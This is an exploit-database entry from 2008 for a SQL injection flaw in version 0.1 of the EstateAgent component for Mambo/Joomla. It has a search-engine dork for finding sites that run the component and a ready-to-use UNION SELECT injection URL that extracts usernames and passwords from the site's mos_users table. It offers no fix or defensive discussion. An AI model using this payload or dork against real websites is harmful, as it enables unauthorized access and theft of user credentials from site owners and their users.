id: 2571
date: 01/30/2008
title: Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability
author: S@BUN
cves: 

==================================================================
Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability
==================================================================



#########################################################################
#
# joomla SQL Injection(com_estateagent)
#
#########################################################################
#
# DorK 1 : allinurl: allinurl: "com_estateagent"
#
########################################################################
EXPLOIT :

index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN





#  0day.today [2023-03-26]  #